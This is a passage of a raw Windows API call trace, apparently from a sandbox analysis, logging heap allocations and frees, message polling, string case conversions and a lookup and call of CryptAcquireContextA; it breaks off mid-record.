RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.411] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.412] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.412] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.412] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.417] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.418] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.418] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0265.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.422] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0265.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.422] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0265.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.423] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.423] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.423] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.424] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.424] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.424] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.424] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0265.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.424] RtlAllocateHeap 